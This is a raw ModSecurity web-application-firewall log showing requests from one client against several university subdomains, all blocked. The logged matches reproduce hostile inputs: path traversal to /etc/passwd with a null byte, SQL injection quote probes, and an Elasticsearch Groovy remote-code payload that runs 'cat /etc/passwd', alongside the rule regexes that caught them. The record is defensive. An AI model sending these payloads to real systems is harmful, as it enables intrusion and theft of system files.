[Tue Aug 29 11:47:49.495386 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkcgTUAAAAM"]
[Tue Aug 29 11:47:49.496139 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAjrbKMAAAAP"]
[Tue Aug 29 11:47:49.569044 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkcgTYAAAAM"]
[Tue Aug 29 11:47:49.569320 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAjtc4gAAAAX"]
[Tue Aug 29 11:47:49.571527 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAkNPogAAAAI"]
[Tue Aug 29 11:47:49.572031 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO14dcCo-f0AAAj1190AAAAa"]
[Tue Aug 29 11:47:49.585344 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkAL80AAAAU"]
[Tue Aug 29 11:47:49.586990 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dcCo-f0AAAkaC@oAAAAJ"]
[Tue Aug 29 11:47:50.356100 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkNPokAAAAI"]
[Tue Aug 29 11:47:50.359797 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkAL84AAAAU"]
[Tue Aug 29 11:47:50.360370 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjrbKUAAAAP"]
[Tue Aug 29 11:47:50.363286 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjL8W4AAAAR"]
[Tue Aug 29 11:47:50.393484 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjtc4oAAAAX"]
[Tue Aug 29 11:47:50.398760 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkAL88AAAAU"]
[Tue Aug 29 11:47:50.409253 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjbw28AAAAW"]
[Tue Aug 29 11:47:50.415277 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14dsCo-f0AAAj11@AAAAAa"]
[Tue Aug 29 11:47:50.415853 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAhl0McAAAAi"]
[Tue Aug 29 11:47:50.418618 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjrbKcAAAAP"]
[Tue Aug 29 11:47:50.423835 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAjtc4sAAAAX"]
[Tue Aug 29 11:47:50.424306 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkNPosAAAAI"]
[Tue Aug 29 11:47:50.439959 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAkAL9EAAAAU"]
[Tue Aug 29 11:47:50.440808 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAjqDFMAAAAH"]
[Tue Aug 29 11:47:50.443340 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkNPowAAAAI"]
[Tue Aug 29 11:47:50.443640 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14dsCo-f0AAAjtc4wAAAAX"]
[Tue Aug 29 11:47:50.456733 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-1-1180-2669-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ebook/cart.php"] [unique_id "ZO14dsCo-f0AAAkaC@8AAAAJ"]
[Tue Aug 29 11:47:51.389567 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bookisbn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:bookisbn: 978-0-7303-1484-4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ebook/book.php"] [unique_id "ZO14d8Co-f0AAAkAL9IAAAAU"]
[Tue Aug 29 11:47:51.393157 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\r\\n  "name": "test"\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5cr\\x5cn  \\x22name\\x22: \\x22test\\x22\\x5cr\\x5cn}: {\\x0d\\x0a  \\x22name\\x22: \\x22test\\x22\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/website/blog/"] [unique_id "ZO14d8Co-f0AAAkdu4EAAAAO"]
[Tue Aug 29 11:47:51.415384 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "ft.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAkBKo8AAAAb"]
[Tue Aug 29 11:47:51.437136 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14d8Co-f0AAAkNPo4AAAAI"]
[Tue Aug 29 11:47:51.442739 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAjdQQYAAAAZ"]
[Tue Aug 29 11:47:51.442884 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [hostname "journal.unla.ac.id"] [uri "/_search"] [unique_id "ZO14d8Co-f0AAAhT4DUAAAAD"]
[Tue Aug 29 11:47:51.457048 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\\\\"java.lang.Runtime\\\\").getRuntime().exec(\\\\"cat /etc/passwd\\\\").getText()"}}}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22size\\x22:1, \\x22script_fields\\x22: {\\x22lupin\\x22:{\\x22lang\\x22:\\x22groovy\\x22,\\x22script\\x22: \\x22java.lang.Math.class.forName(\\x5c\\x5c\\x22java.lang.Runtime\\x5c\\x5c\\x22).getRuntime().exec(\\x5c\\x5c\\x22cat /etc/passwd\\x5c\\x5c\\x22).getText()\\x22}}}: {size:1 script_fields: {lupin:{lang:groovy script: java.lang.math.class.forname(java.lang.runtime).getruntime().exec(cat/etc/passwd).gettext()}}}"] [severity "CRITICAL"] [ver 